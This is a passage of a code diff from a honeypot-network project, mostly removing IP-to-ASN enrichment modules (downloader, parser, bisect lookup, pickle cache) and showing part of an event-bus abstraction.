        "unknown, re-push".
    """
    try:
        bridge_names = []
        for network in docker_client.networks.list():
            if network.attrs.get("Driver") != "bridge":
                continue
            if network.name.startswith("decnet-topology-"):
                bridge_names.append(network.name)

        container_names = []
        # all=False: only containers that are currently running.
        for container in docker_client.containers.list(all=False):
            if container.name.startswith("decnet-"):
                container_names.append(container.name)

        bridge_names.sort()
        container_names.sort()
        return {"bridges": bridge_names, "containers": container_names}
    except Exception as exc:  # noqa: BLE001 — best-effort observation
        return {"error": str(exc)[:200]}
|
||||
|
||||
|
||||
__all__ = ["TopologyStore", "AppliedRow", "AlreadyApplied", "observed"]
|
||||
@@ -148,7 +148,7 @@ ARCHETYPES: dict[str, Archetype] = {
|
||||
slug="deaddeck",
|
||||
display_name="Deaddeck (Entry Point)",
|
||||
description="Internet-facing entry point with real interactive SSH — no honeypot emulation",
|
||||
services=["ssh"],
|
||||
services=["real_ssh"],
|
||||
preferred_distros=["debian", "ubuntu22"],
|
||||
nmap_os="linux",
|
||||
),
|
||||
@@ -167,4 +167,4 @@ def all_archetypes() -> dict[str, Archetype]:
|
||||
|
||||
|
||||
def random_archetype() -> Archetype:
|
||||
return random.choice(list(ARCHETYPES.values())) # nosec B311
|
||||
return random.choice(list(ARCHETYPES.values()))
|
||||
|
||||
@@ -1,92 +0,0 @@
|
||||
"""
|
||||
IP-to-ASN enrichment — maps attacker IPs to BGP-announced AS numbers and
|
||||
org names for attacker intelligence.
|
||||
|
||||
Public surface mirrors :mod:`decnet.geoip` so callers can compose them:
|
||||
|
||||
* :func:`get_lookup` — returns the singleton :class:`AsnLookup`.
|
||||
* :func:`enrich_ip` — takes an IP string, returns
|
||||
``(asn_int, asn_name, provider_name)`` or ``(None, None, None)``.
|
||||
|
||||
Provider selection goes through :func:`~decnet.asn.factory.get_provider`
|
||||
(env ``DECNET_ASN_PROVIDER``, default ``iptoasn``). Direct imports of
|
||||
concrete providers are forbidden — mirrors the ``get_bus`` /
|
||||
``get_repository`` rule.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import time
|
||||
from typing import Optional, Tuple
|
||||
|
||||
from decnet.asn.factory import get_provider
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ASN_ROOT
|
||||
|
||||
# 24 h — iptoasn refreshes daily.
|
||||
REFRESH_INTERVAL_S = 86_400
|
||||
|
||||
_lookup: Optional[AsnLookup] = None
|
||||
_provider_name: Optional[str] = None
|
||||
|
||||
|
||||
# Minimum seconds between *automatic* refresh attempts for one provider.
# A refresh whose download fails leaves the data files stale, so without
# this guard every later call would re-run the download and rebuild the
# index — on a host without egress that is one blocking fetch per lookup.
_REFRESH_RETRY_S: float = 300.0

# ``time.monotonic()`` of the last refresh attempt and the provider it was
# made for; ``None`` until the first attempt in this process.
_last_refresh_attempt: Optional[float] = None
_last_refresh_provider: Optional[object] = None


def get_lookup(*, force_refresh: bool = False) -> AsnLookup:
    """Return the cached :class:`AsnLookup`, building it on first use.

    If the provider's data files are missing or older than
    ``REFRESH_INTERVAL_S`` seconds, refresh before building. Automatic
    refreshes are attempted at most once every ``_REFRESH_RETRY_S`` seconds
    per provider instance, so a failing download does not turn every call
    into a network round-trip plus an index rebuild; in between, the
    previously built lookup is returned.

    Pass ``force_refresh=True`` to bypass both the age check and the retry
    throttle (used by a future ``decnet asn refresh`` CLI command).

    Raises:
        Whatever the provider's ``refresh()`` / ``build_lookup()`` raise.
    """
    global _lookup, _provider_name
    global _last_refresh_attempt, _last_refresh_provider
    provider = get_provider()
    _provider_name = provider.name

    should_refresh = force_refresh
    if not should_refresh and _files_stale(provider):
        # A different provider object (e.g. after the factory cache was
        # reset) gets a fresh attempt immediately.
        should_refresh = (
            _last_refresh_provider is not provider
            or _last_refresh_attempt is None
            or time.monotonic() - _last_refresh_attempt >= _REFRESH_RETRY_S
        )

    if should_refresh:
        # Record the attempt first so a raising refresh() is throttled too.
        _last_refresh_attempt = time.monotonic()
        _last_refresh_provider = provider
        provider.refresh()
        _lookup = None  # force a rebuild from the refreshed files

    if _lookup is None:
        _lookup = provider.build_lookup()
    return _lookup
|
||||
|
||||
|
||||
def enrich_ip(ip: str) -> Tuple[Optional[int], Optional[str], Optional[str]]:
    """Look up *ip* and return ``(asn, as_name, provider_name)``.

    The result is ``(None, None, None)`` when enrichment is disabled, when
    the lookup has no entry for *ip*, or when anything in the lookup path
    raises. This function never raises, so the caller (profiler) can upsert
    the attacker row regardless.

    Setting ``DECNET_ASN_ENABLED=false`` (case-insensitive) skips the whole
    path — handy for tests, agent hosts, or ops who want enrichment off
    without touching provider config.
    """
    nothing = (None, None, None)

    enabled_flag = os.environ.get("DECNET_ASN_ENABLED", "true")
    if enabled_flag.lower() == "false":
        return nothing

    try:
        info = get_lookup().asn(ip)
        if info is not None:
            # An empty AS name is reported as None; a missing provider tag
            # falls back to "unknown".
            return (info.asn, info.name or None, _provider_name or "unknown")
        return nothing
    except Exception:
        return nothing
|
||||
|
||||
|
||||
def _files_stale(provider) -> bool:
|
||||
"""True when the provider has no fresh data on disk.
|
||||
|
||||
Same semantics as :func:`decnet.geoip._files_stale`: a partial
|
||||
cache still produces correct answers for the ranges it covers.
|
||||
"""
|
||||
paths = provider.data_paths()
|
||||
if not paths:
|
||||
return True
|
||||
now = time.time()
|
||||
for p in paths:
|
||||
if p.exists() and now - p.stat().st_mtime <= REFRESH_INTERVAL_S:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
__all__ = ["get_lookup", "enrich_ip", "ASN_ROOT", "REFRESH_INTERVAL_S"]
|
||||
@@ -1,33 +0,0 @@
|
||||
"""ASN provider protocol — mirror of :mod:`decnet.geoip.base`.
|
||||
|
||||
Concrete providers (e.g. :mod:`decnet.asn.iptoasn`) implement this.
|
||||
Callers must go through :func:`decnet.asn.factory.get_provider`; never
|
||||
import a concrete provider class directly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from pathlib import Path
|
||||
from typing import Sequence
|
||||
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
|
||||
|
||||
class Provider(ABC):
    """Abstract IP→ASN data provider.

    Subclasses supply the three operations below plus a ``name`` tag.
    """

    #: Short tag written to ``Attacker.asn_source`` (e.g. ``'iptoasn'``).
    name: str

    @abstractmethod
    def refresh(self) -> None:
        """Download / regenerate the provider's raw data files."""

    @abstractmethod
    def build_lookup(self) -> AsnLookup:
        """Parse the on-disk data files and return a ready-to-query lookup."""

    @abstractmethod
    def data_paths(self) -> Sequence[Path]:
        """Return the list of files this provider manages — used for staleness
        detection. Order is not significant."""
|
||||
@@ -1,39 +0,0 @@
|
||||
"""ASN provider factory — mirror of :mod:`decnet.geoip.factory`.
|
||||
|
||||
Dispatch key: ``DECNET_ASN_PROVIDER`` (default ``iptoasn``). Lazy
|
||||
singleton.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Optional
|
||||
|
||||
from decnet.asn.base import Provider
|
||||
|
||||
_cached: Optional[Provider] = None
|
||||
_cached_key: Optional[str] = None
|
||||
|
||||
|
||||
def get_provider() -> Provider:
    """Return the :class:`Provider` selected by ``DECNET_ASN_PROVIDER``.

    The env var is read on every call (lower-cased, default ``iptoasn``).
    The instance is cached together with the key it was built for, so it
    is reused until the configured key changes.

    Raises:
        ValueError: the configured provider key is not supported.
    """
    global _cached, _cached_key
    key = os.environ.get("DECNET_ASN_PROVIDER", "iptoasn").lower()

    cache_hit = _cached is not None and _cached_key == key
    if cache_hit:
        return _cached

    if key != "iptoasn":
        raise ValueError(f"Unsupported ASN provider: {key!r}")

    # Imported lazily so the concrete provider is only loaded when selected.
    from decnet.asn.iptoasn.provider import IptoasnProvider

    provider: Provider = IptoasnProvider()
    _cached, _cached_key = provider, key
    return provider
|
||||
|
||||
|
||||
def reset_cache() -> None:
    """Drop the cached provider and its key.

    Tests swap providers via the env var and call this so the next
    :func:`get_provider` call builds a fresh instance.
    """
    global _cached, _cached_key
    _cached = _cached_key = None
|
||||
@@ -1,9 +0,0 @@
|
||||
"""iptoasn.com IP→ASN provider.
|
||||
|
||||
Daily-refreshed gzipped TSV dump of the global BGP table, derived from
|
||||
RIPE RIS. Released into the public domain by upstream — no attribution
|
||||
required, no UA mandate, no terms to violate.
|
||||
|
||||
Direct imports of :class:`IptoasnProvider` are discouraged — go through
|
||||
:func:`decnet.asn.factory.get_provider`.
|
||||
"""
|
||||
@@ -1,63 +0,0 @@
|
||||
"""iptoasn.com bulk dump download.
|
||||
|
||||
One file: ``ip2asn-v4.tsv.gz``, ~5 MB compressed, refreshed daily.
|
||||
Pulled over HTTPS with the same generic UA the geoip RIR fetcher uses
|
||||
(stealth: never identify as DECNET — public-data scrapers correlated to
|
||||
honeypot operator egress is the threat model).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import shutil
|
||||
import urllib.request
|
||||
from pathlib import Path
|
||||
from typing import Tuple
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.fetch")
|
||||
|
||||
# Mirror the (name, url) tuple shape of geoip.rir.fetch so test
|
||||
# harnesses can swap one for the other.
|
||||
IPTOASN_SOURCES: Tuple[Tuple[str, str], ...] = (
|
||||
("ip2asn-v4", "https://iptoasn.com/data/ip2asn-v4.tsv.gz"),
|
||||
)
|
||||
|
||||
# Generic UA — matches geoip.rir.fetch. iptoasn.com explicitly releases
|
||||
# the data into the public domain and does NOT require an identifying UA,
|
||||
# so we keep DECNET stealth instead of advertising.
|
||||
_USER_AGENT = "Mozilla/5.0 (compatible; fetch/1.0)"
|
||||
_TIMEOUT_S = 60
|
||||
|
||||
|
||||
def fetch_all(dest: Path) -> list[Path]:
    """Fetch every entry of ``IPTOASN_SOURCES`` into *dest*.

    Each file is downloaded to ``{name}.tsv.gz.tmp`` and then renamed over
    ``{name}.tsv.gz``, so the swap is atomic per file. When a download
    fails the error is logged, the temp file is removed and the previous
    generation of that file is left untouched.

    Returns:
        The paths that were successfully written, in source order. An
        empty list means nothing was fetched.
    """
    dest.mkdir(parents=True, exist_ok=True)
    fetched: list[Path] = []

    for name, url in IPTOASN_SOURCES:
        final_path = dest / f"{name}.tsv.gz"
        partial_path = final_path.with_name(final_path.name + ".tmp")
        try:
            _download(url, partial_path)
            partial_path.replace(final_path)
            fetched.append(final_path)
            size = final_path.stat().st_size
            logger.info("asn.iptoasn: fetched %s (%d bytes)", name, size)
        except Exception as exc:
            logger.error(
                "asn.iptoasn: fetch failed for %s (%s): %s", name, url, exc
            )
            # Drop the partial download; the stale previous file stays —
            # better outdated than empty.
            partial_path.unlink(missing_ok=True)

    return fetched
|
||||
|
||||
|
||||
def _download(url: str, dest: Path) -> None:
    """Stream the body of *url* into the file *dest*.

    The request carries the generic ``_USER_AGENT`` header and uses
    ``_TIMEOUT_S`` as the timeout. Errors from opening the URL or writing
    the file propagate to the caller.
    """
    request = urllib.request.Request(url, headers={"User-Agent": _USER_AGENT})
    with urllib.request.urlopen(request, timeout=_TIMEOUT_S) as response:  # nosec B310 — fixed https iptoasn URL
        with dest.open("wb") as out:
            shutil.copyfileobj(response, out)
|
||||
@@ -1,78 +0,0 @@
|
||||
"""Parser for the iptoasn.com ``ip2asn-v4.tsv`` dump.
|
||||
|
||||
Line shape (gzipped, one row per BGP-announced prefix)::
|
||||
|
||||
1.0.0.0\\t1.0.0.255\\t13335\\tUS\\tCLOUDFLARENET
|
||||
|
||||
Fields: ``range_start``, ``range_end``, ``as_number``, ``country_code``,
|
||||
``as_description``. Both range columns are dotted IPv4 strings (the dump
|
||||
is IPv4-only — there's a separate ``ip2asn-v6.tsv.gz`` we don't pull).
|
||||
|
||||
Rows skipped:
|
||||
|
||||
* ``as_number == 0`` — iptoasn's sentinel for "unannounced" / private
|
||||
/ reserved space. Country may still be present (``"None"`` / two-letter
|
||||
CC) but we don't care: the geoip module owns country, ASN owns BGP.
|
||||
* Rows where either range column won't parse as IPv4.
|
||||
* Rows with fewer than 3 tab-separated columns.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import gzip
|
||||
import ipaddress
|
||||
import logging
|
||||
from pathlib import Path
|
||||
from typing import Iterator
|
||||
|
||||
from decnet.asn.lookup import AsnInfo, Range
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.parse")
|
||||
|
||||
|
||||
def parse_file(path: Path) -> Iterator[Range]:
    """Yield ``(start_int, end_int_inclusive, AsnInfo)`` for every BGP row.

    A path ending in ``.gz`` is read through :mod:`gzip`; anything else is
    opened as plain text, which lets test harnesses hand-craft small TSV
    fixtures. Undecodable bytes are replaced rather than raising.

    Rows are silently dropped when they are blank, have fewer than three
    tab-separated columns, carry AS number 0, or have an end address below
    the start address. Rows whose AS number or addresses fail to parse are
    dropped with a debug log line.
    """
    if path.suffix == ".gz":
        open_text = gzip.open
    else:
        open_text = open

    with open_text(path, "rt", encoding="utf-8", errors="replace") as handle:
        for lineno, raw in enumerate(handle, 1):
            row = raw.rstrip("\n")
            if not row:
                continue

            columns = row.split("\t")
            if len(columns) < 3:
                continue
            start_text, end_text, asn_text = columns[:3]
            # The AS description lives in the 5th column. iptoasn quotes
            # nothing, but stray whitespace happens; "" when absent.
            description = columns[4].strip() if len(columns) > 4 else ""

            try:
                asn_number = int(asn_text)
            except ValueError:
                logger.debug(
                    "asn.iptoasn: skipping malformed asn line %d in %s",
                    lineno, path.name,
                )
                continue
            # AS 0 is iptoasn's sentinel for unannounced / reserved space:
            # nothing useful to attach, so skip it.
            if asn_number == 0:
                continue

            try:
                first = int(ipaddress.IPv4Address(start_text))
                last = int(ipaddress.IPv4Address(end_text))
            except (ValueError, ipaddress.AddressValueError):
                logger.debug(
                    "asn.iptoasn: skipping malformed addr line %d in %s",
                    lineno, path.name,
                )
                continue
            if last < first:
                continue

            yield (first, last, AsnInfo(asn=asn_number, name=description))
|
||||
@@ -1,83 +0,0 @@
|
||||
"""iptoasn provider — orchestrates fetch + parse into an :class:`AsnLookup`.
|
||||
|
||||
Mirrors :class:`decnet.geoip.rir.provider.RirProvider` exactly: fetch,
|
||||
build a pickled cache, invalidate when raw files are newer than the
|
||||
cache.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from pathlib import Path
|
||||
from typing import Sequence
|
||||
|
||||
from decnet.asn.base import Provider
|
||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||
from decnet.asn.iptoasn.parse import parse_file
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ensure_root
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||
|
||||
# Pickled lookup cache — skips re-parsing the ~580k-row gz dump on every
|
||||
# profiler restart. Rebuilt whenever any raw file is newer than the
|
||||
# cache, see ``_cache_fresh``.
|
||||
_CACHE_NAME = ".iptoasn_index.pkl"
|
||||
|
||||
|
||||
class IptoasnProvider(Provider):
    """iptoasn.com-backed :class:`Provider`.

    Raw dumps and the pickled index both live under the directory returned
    by ``ensure_root()``.
    """

    name = "iptoasn"

    def __init__(self) -> None:
        self._root = ensure_root()

    # ---------- Provider interface ----------

    def refresh(self) -> None:
        """Re-download the dump and invalidate the pickled index.

        The index is only dropped when at least one file was actually
        fetched. ``fetch_all`` keeps the previous generation on failure, so
        after a failed download the existing index still matches the files
        on disk and throwing it away would only force a full re-parse.
        """
        logger.info("asn.iptoasn: refreshing dump into %s", self._root)
        written = fetch_all(self._root)
        if not written:
            logger.warning(
                "asn.iptoasn: refresh fetched nothing; keeping existing index"
            )
            return
        (self._root / _CACHE_NAME).unlink(missing_ok=True)

    def build_lookup(self) -> AsnLookup:
        """Return a lookup, from the pickled index when it is still fresh.

        Falls back to parsing every existing data file when the index is
        missing, older than a raw file, or fails to load. A failure to
        write the rebuilt index is logged and otherwise ignored.
        """
        cache = self._root / _CACHE_NAME
        if self._cache_fresh(cache):
            try:
                lookup = AsnLookup.load(cache)
                logger.debug(
                    "asn.iptoasn: loaded cached index (%d ranges)",
                    len(lookup),
                )
                return lookup
            except Exception as exc:
                # A corrupt or incompatible pickle is not fatal: rebuild.
                logger.warning(
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )

        ranges = []
        for path in self.data_paths():
            if not path.exists():
                continue
            ranges.extend(parse_file(path))
        lookup = AsnLookup.from_ranges(ranges)
        try:
            lookup.save(cache)
        except Exception as exc:
            logger.warning("asn.iptoasn: cache save failed: %s", exc)
        logger.info("asn.iptoasn: built index with %d ranges", len(lookup))
        return lookup

    def data_paths(self) -> Sequence[Path]:
        """Return one ``{name}.tsv.gz`` path per ``IPTOASN_SOURCES`` entry."""
        return [self._root / f"{name}.tsv.gz" for name, _url in IPTOASN_SOURCES]

    # ---------- internals ----------

    def _cache_fresh(self, cache: Path) -> bool:
        """True when the pickle exists and is at least as new as every raw file."""
        if not cache.exists():
            return False
        cache_mtime = cache.stat().st_mtime
        for path in self.data_paths():
            if path.exists() and path.stat().st_mtime > cache_mtime:
                return False
        return True
|
||||
@@ -1,126 +0,0 @@
|
||||
"""Provider-agnostic IP→ASN lookup.
|
||||
|
||||
A :class:`AsnLookup` is a frozen, sorted array of ``(start_ip,
|
||||
end_ip_inclusive, AsnInfo)`` ranges queried via :mod:`bisect`.
|
||||
O(log n) on ~600k ranges (a current iptoasn dump is ~580k rows).
|
||||
|
||||
Private/loopback/invalid IPv4 and all IPv6 addresses resolve to
|
||||
``None`` — the same policy :mod:`decnet.geoip.lookup` uses.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import bisect
|
||||
import ipaddress
|
||||
import pickle # nosec B403 — self-produced cache under /var/lib/decnet, never deserialized from untrusted input
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Iterable, List, Optional, Tuple
|
||||
|
||||
|
||||
@dataclass(frozen=True)
class AsnInfo:
    """One BGP-announced prefix's origin metadata."""

    asn: int  # AS number of the range
    name: str  # AS description / org name; "" if absent in the source data
|
||||
|
||||
|
||||
Range = Tuple[int, int, AsnInfo]
|
||||
|
||||
|
||||
@dataclass
class AsnLookup:
    """Bisect-searchable index mapping IPv4 ranges to AS metadata."""

    # Three parallel lists, one entry per range, ordered by start address:
    # start (int), inclusive end (int), and the AsnInfo for that range.
    _starts: List[int]
    _ends: List[int]
    _infos: List[AsnInfo]

    @classmethod
    def from_ranges(cls, ranges: Iterable[Range]) -> "AsnLookup":
        """Build a lookup from ``(start, end_inclusive, AsnInfo)`` triples.

        The triples are ordered by ``(start, end)``. When several share a
        start address only one survives: the one that sorts last, i.e. the
        largest end, with equal ends resolved in favour of the later input
        (the sort is stable). Distinct starts are all kept, so adjacent
        non-overlapping ranges are preserved.
        """
        ordered = sorted(ranges, key=lambda r: (r[0], r[1]))
        # Keyed by start: a later triple with the same start overwrites the
        # earlier one while the key keeps its original (sorted) position.
        by_start: dict = {}
        for start, end, info in ordered:
            by_start[start] = (end, info)
        return cls(
            list(by_start),
            [end for end, _info in by_start.values()],
            [info for _end, info in by_start.values()],
        )

    def asn(self, ip: str) -> Optional[AsnInfo]:
        """Return the :class:`AsnInfo` covering *ip*, or ``None``.

        ``None`` covers: strings that do not parse as an IP address, IPv6
        addresses, IPv4 addresses flagged private / loopback / link-local /
        multicast / reserved / unspecified, and addresses that fall outside
        every stored range.
        """
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return None
        if addr.version != 4:
            return None

        not_routable = (
            addr.is_private
            or addr.is_loopback
            or addr.is_link_local
            or addr.is_multicast
            or addr.is_reserved
            or addr.is_unspecified
        )
        if not_routable:
            return None

        value = int(addr)
        # Index of the last range whose start is <= value (-1 if none).
        pos = bisect.bisect_right(self._starts, value) - 1
        if pos >= 0 and value <= self._ends[pos]:
            return self._infos[pos]
        return None

    def __len__(self) -> int:
        return len(self._starts)

    # ---------- persistence ----------

    def save(self, path: Path) -> None:
        """Pickle the lookup to *path*.

        The data is written to ``<path>.tmp`` first and then renamed over
        *path*; missing parent directories are created.
        """
        scratch = path.with_suffix(path.suffix + ".tmp")
        scratch.parent.mkdir(parents=True, exist_ok=True)
        with scratch.open("wb") as fh:
            # AsnInfo objects are flattened to plain (asn, name) tuples.
            payload = {
                "version": 1,
                "starts": self._starts,
                "ends": self._ends,
                "infos": [(entry.asn, entry.name) for entry in self._infos],
            }
            pickle.dump(payload, fh, protocol=pickle.HIGHEST_PROTOCOL)
        scratch.replace(path)

    @classmethod
    def load(cls, path: Path) -> "AsnLookup":
        """Load a lookup previously written by :meth:`save`.

        Raises:
            ValueError: the file's ``version`` field is not ``1``.
        """
        with path.open("rb") as fh:
            payload = pickle.load(fh)  # nosec B301 — self-produced file under /var/lib/decnet
        version = payload.get("version")
        if version != 1:
            raise ValueError(
                f"unsupported asn-lookup index version: {version!r}"
            )
        restored = [AsnInfo(asn=a, name=n) for a, n in payload["infos"]]
        return cls(payload["starts"], payload["ends"], restored)
|
||||
@@ -1,18 +0,0 @@
|
||||
"""Filesystem layout for ASN data — mirror of :mod:`decnet.geoip.paths`.
|
||||
|
||||
``ASN_ROOT`` is where providers drop their raw files and cache indexes.
|
||||
Default ``/var/lib/decnet/asn``. Override with ``DECNET_ASN_ROOT`` for
|
||||
test harnesses.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
ASN_ROOT = Path(os.environ.get("DECNET_ASN_ROOT", "/var/lib/decnet/asn"))
|
||||
|
||||
|
||||
def ensure_root() -> Path:
    """Create ``ASN_ROOT`` if absent and return it. No-op if present.

    Missing parent directories are created as well.
    """
    ASN_ROOT.mkdir(parents=True, exist_ok=True)
    return ASN_ROOT
|
||||
@@ -1,18 +0,0 @@
|
||||
"""DECNET ServiceBus — pub/sub notification substrate.
|
||||
|
||||
The bus is the notification layer for DECNET's worker constellation. The DB
|
||||
remains the source of truth for anything durable; the bus carries "something
|
||||
happened, go look" events. Delivery is at-most-once, fire-and-forget.
|
||||
|
||||
Consumers call :func:`get_bus` from :mod:`decnet.bus.factory`; never import
|
||||
transport implementations directly. The factory selects the backend via
|
||||
``DECNET_BUS_TYPE`` (``nats`` or ``fake``) and honors ``DECNET_BUS_ENABLED``.
|
||||
|
||||
Topic hierarchy is defined in :mod:`decnet.bus.topics` and locked early so
|
||||
consumers can subscribe with stable wildcard patterns.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.bus.base import BaseBus, Event, Subscription
|
||||
|
||||
__all__ = ["BaseBus", "Event", "Subscription"]
|
||||
@@ -1,92 +0,0 @@
|
||||
"""Process-wide bus singleton for request-serving workers (API, SSE routes).
|
||||
|
||||
A single connected :class:`~decnet.bus.base.BaseBus` shared across request
|
||||
handlers — opening a UNIX socket per request would be wasteful and add
|
||||
latency to the hot path. The API lifespan is responsible for calling
|
||||
:func:`close_app_bus` on shutdown; connect is lazy so tests and
|
||||
contract-test mode that never hit a publish/subscribe code path don't
|
||||
pay for a bus connection they'll never use.
|
||||
|
||||
Failures during :meth:`BaseBus.connect` are swallowed and logged — a
|
||||
dead bus must never break request serving. Publishers should treat a
|
||||
``None`` return from :func:`get_app_bus` as "skip this notification",
|
||||
same as ``DECNET_BUS_ENABLED=false``.
|
||||
|
||||
Connect is **retried with a short backoff** (not one-shot): a startup
|
||||
race where the API lifespan hits :func:`get_app_bus` before ``decnet
|
||||
bus`` is ready would otherwise poison the singleton for the entire
|
||||
process lifetime. Instead we remember the last failure timestamp and
|
||||
let callers retry once ``_RETRY_BACKOFF`` seconds have passed.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import time
|
||||
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.app")
|
||||
|
||||
# Publishers in the hot path shouldn't pay connect-retry latency on every
|
||||
# call; the dashboard's own 5 s poll interval recovers within one tick
|
||||
# once the bus comes up. A persistently-dead bus only gets a connect
|
||||
# attempt every 2 s, not once per request.
|
||||
_RETRY_BACKOFF: float = 2.0
|
||||
|
||||
_lock = asyncio.Lock()
|
||||
_shared: BaseBus | None = None
|
||||
_last_failure_ts: float = 0.0
|
||||
|
||||
|
||||
async def get_app_bus() -> BaseBus | None:
    """Return the shared, connected bus — or ``None`` when it is unavailable.

    The first successful call builds a client with :func:`get_bus`, awaits
    its ``connect()`` and caches it; later calls hand back that instance.
    When connecting raises, the failure is logged and its time recorded,
    and calls made within ``_RETRY_BACKOFF`` seconds return ``None``
    without trying again. The first call after that window retries, which
    is what lets the API recover from a ``decnet bus``-started-after-API
    race without a full API restart.
    """
    global _shared, _last_failure_ts

    def _backing_off() -> bool:
        # True while the last failed connect is still inside the window.
        return (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF

    # Lock-free fast path for the common cases.
    if _shared is not None:
        return _shared
    if _backing_off():
        return None

    async with _lock:
        # Re-check: another task may have connected (or failed) while this
        # one was waiting for the lock.
        if _shared is not None:
            return _shared
        if _backing_off():
            return None
        try:
            bus = get_bus(client_name="api")
            await bus.connect()
        except Exception as exc:  # noqa: BLE001
            log.warning("app bus unavailable: %s", exc)
            _last_failure_ts = time.monotonic()
            return None
        _shared = bus
        _last_failure_ts = 0.0
        return _shared
|
||||
|
||||
|
||||
async def close_app_bus() -> None:
    """Close the shared bus, if any, and forget the last connect failure.

    Intended for the API lifespan shutdown; calling it repeatedly is safe.
    The cached instance is dropped before ``close()`` is awaited, and an
    exception from ``close()`` is logged rather than propagated.

    ``_last_failure_ts`` is reset so that a ``get_app_bus()`` made after a
    shutdown-and-restart inside the same process (rare, but tests do this)
    retries immediately instead of honouring a stale backoff.
    """
    global _shared, _last_failure_ts
    bus = _shared
    _shared = None
    _last_failure_ts = 0.0

    if bus is None:
        return
    try:
        await bus.close()
    except Exception as exc:  # noqa: BLE001
        log.warning("app bus close raised: %s", exc)
|
||||
@@ -1,205 +0,0 @@
|
||||
"""Bus abstractions: the :class:`Event` envelope and the :class:`BaseBus` ABC.
|
||||
|
||||
Every transport (NATS, in-process fake, null) speaks this contract. The
|
||||
envelope is versioned (``v``) so future evolution never breaks deployed
|
||||
consumers that happen to see a newer event shape.
|
||||
|
||||
Subscription model: :meth:`BaseBus.subscribe` returns a :class:`Subscription`
|
||||
that is an async context manager AND an async iterator. The expected usage is:
|
||||
|
||||
async with bus.subscribe("topology.*.mutation.*") as sub:
|
||||
async for event in sub:
|
||||
handle(event)
|
||||
|
||||
Leaving the ``async with`` releases the underlying subscription handle; the
|
||||
transport is free to drop any buffered events after that point.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import abc
|
||||
import asyncio
|
||||
import time
|
||||
import uuid
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any, AsyncIterator
|
||||
|
||||
EVENT_SCHEMA_VERSION = 1


@dataclass(frozen=True)
class Event:
    """The bus envelope.

    ``v`` is the envelope schema version, bumped on incompatible shape
    changes.  ``type`` is a short discriminator (``"mutation.applied"``,
    ``"decky.state"``) for consumers that subscribe to a broad wildcard and
    dispatch in Python; it is redundant with the trailing segments of
    ``topic`` but cheaper to inspect.  ``ts`` is epoch seconds (float).
    ``id`` is a random UUID hex string so consumers can de-duplicate if they
    ever see the same event twice (not expected under at-most-once delivery,
    but cheap insurance).
    """

    topic: str
    payload: dict[str, Any]
    type: str = ""
    v: int = EVENT_SCHEMA_VERSION
    ts: float = field(default_factory=time.time)
    id: str = field(default_factory=lambda: uuid.uuid4().hex)

    def to_dict(self) -> dict[str, Any]:
        """Return the wire-format dict for this event."""
        return {
            "v": self.v,
            "id": self.id,
            "topic": self.topic,
            "type": self.type,
            "ts": self.ts,
            "payload": self.payload,
        }

    @classmethod
    def from_dict(cls, topic: str, data: dict[str, Any]) -> "Event":
        """Reconstruct an Event from a wire-format dict.

        ``topic`` is passed explicitly because the transport knows which
        subject the message arrived on; trusting a ``topic`` field from the
        wire would let a misbehaving publisher spoof events on topics they
        don't actually publish to.

        Missing *or explicitly null* fields fall back to their defaults:
        empty payload/type, the current schema version, the current time and
        a fresh id.  Non-null ``v``/``ts`` values are coerced with ``int`` /
        ``float`` and may raise ``ValueError``/``TypeError`` if they are not
        numeric.
        """
        raw_version = data.get("v")
        raw_ts = data.get("ts")
        return cls(
            topic=topic,
            payload=data.get("payload") or {},
            type=data.get("type") or "",
            # A JSON ``null`` must behave like an absent key, matching how
            # payload/type/id are handled, instead of crashing in int()/float().
            v=EVENT_SCHEMA_VERSION if raw_version is None else int(raw_version),
            ts=time.time() if raw_ts is None else float(raw_ts),
            id=data.get("id") or uuid.uuid4().hex,
        )
|
||||
|
||||
|
||||
class Subscription(abc.ABC):
    """Handle for one open subscription.

    Works both as an async context manager and as an async iterator of
    events.  Transports derive from this class and supply ``__anext__`` and
    :meth:`_aclose`; callers obtain instances through
    :meth:`BaseBus.subscribe` rather than constructing them directly.
    """

    def __init__(self, pattern: str) -> None:
        self.pattern = pattern
        # Flipped exactly once by aclose(); subclasses may read it.
        self._closed = False

    # -- transport hooks ----------------------------------------------------

    @abc.abstractmethod
    async def __anext__(self) -> Event:  # pragma: no cover - abstract
        raise NotImplementedError

    @abc.abstractmethod
    async def _aclose(self) -> None:  # pragma: no cover - abstract
        raise NotImplementedError

    # -- public protocol ----------------------------------------------------

    def __aiter__(self) -> AsyncIterator[Event]:
        return self

    async def aclose(self) -> None:
        """Close the subscription; only the first call reaches ``_aclose``."""
        if not self._closed:
            # Mark closed before awaiting so a re-entrant call is a no-op.
            self._closed = True
            await self._aclose()

    async def __aenter__(self) -> "Subscription":
        return self

